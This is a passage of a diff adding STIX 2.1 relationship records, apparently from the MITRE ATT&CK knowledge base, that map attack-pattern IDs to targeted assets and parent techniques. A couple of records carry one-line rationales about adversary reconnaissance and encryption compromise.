"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b020c4b-bd07-4fe6-9ecb-d0c6f3a011e7", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b0cee22-5ba7-46a1-9247-5213eacdf4d5", + "created": "2024-05-22T17:24:39.733Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:54:09.266Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b27c9b6-d686-4843-8d66-f8a9187e071c", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b33ca7e-3b33-44db-9479-1bba85e76902", + "created": "2020-03-16T16:06:08.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b3857d4-bb26-46c2-81ac-a8a82211b824", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b3f6880-6fd6-4920-8c89-18bd8cb8ffb4", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b40427a-1649-4316-baae-860bfad1d05c", + "created": "2024-05-22T17:19:37.261Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:58:29.486Z", + "description": "Asset Mapping Rationale: Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. Adversaries can compromise and manipulate devices that perform encryption of network traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2b7d57d7-3802-4b59-99c6-1e1597fe78d1", + "created": "2023-09-29T18:46:54.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:46:54.684Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ba17ab3-f9ae-4052-a7c7-b6d0e10b8b96", + "created": "2020-03-02T14:27:49.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", + "target_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ba87bcc-8346-45b5-97e1-ca0b19a9f687", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bb32fa1-6e44-43ee-9bcb-2993d6c0af3a", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bb931c2-d3ae-4956-aba7-6e42c46cdc5a", + "created": "2020-03-27T21:32:21.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bbcc7da-f535-4974-bc08-4edb5a235828", + "created": "2020-10-02T17:05:43.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bca02df-f070-4eea-9393-daa574793b86", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bcb237b-250a-47e6-a87f-c593481b2124", + "created": "2024-06-26T13:41:25.202Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:41:25.202Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2bd00c10-dace-4747-931e-67915d9aab7d", + "created": "2020-03-09T14:12:31.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c07b79e-1d54-49c9-bdfd-b64f80994de9", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c29647b-edc9-4efa-af0d-72deee37933d", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c2a2880-397a-4d26-8cda-abe2cde96ad6", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c2fc4fc-1c2d-4a97-871e-fe65ee8c9d7c", + "created": "2020-01-24T14:27:29.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", + "target_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c4c8178-d95a-4e5c-a9e0-e5fd52f5621b", + "created": "2020-10-02T15:46:24.764Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c75a8eb-151b-4b6d-8360-3f832b306222", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c78a913-5b17-4942-a6e9-8bfa4c24149b", + "created": "2020-03-14T23:23:41.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2c79920a-f2d1-4114-a1df-924835da645c", + "created": "2023-09-28T19:53:00.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:53:00.672Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ca51b87-1607-4683-ac1c-95700468e6d9", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2cab74fa-0329-4786-aec2-40f8dcd1ddfe", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2cb10302-493f-4efb-9b8f-e4fdfdd79ab3", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2ce2b000-d1c4-4ea6-938a-e1ad6b13bd88", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2cea4c8c-4b22-4656-8e4e-fc52555f7b22", + "created": "2023-09-29T15:28:43.010Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T15:28:43.010Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2cf3d3a5-85ab-43d9-8462-684469f79c6a", + "created": "2020-03-14T23:29:19.766Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d084b09-6803-45c7-a310-d332ffe6d1c1", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d0bed1d-342b-44a0-aec8-e6d7c6596fa2", + "created": "2023-09-29T16:33:12.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:33:12.887Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d1aeed0-f5ec-4119-93a9-1a5fdbd60826", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d2ad5c3-ffe4-49b1-87d4-4927271793fa", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d753eb5-9193-4859-ad90-1e87336ac9b3", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d7593fd-a1ec-46d1-b80a-e1986d269dc6", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2d7deb28-0fcf-495b-9d41-01529d356674", + "created": "2020-01-30T14:11:41.737Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2db36f5e-b1b8-4034-b786-f85c18f80cd3", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": 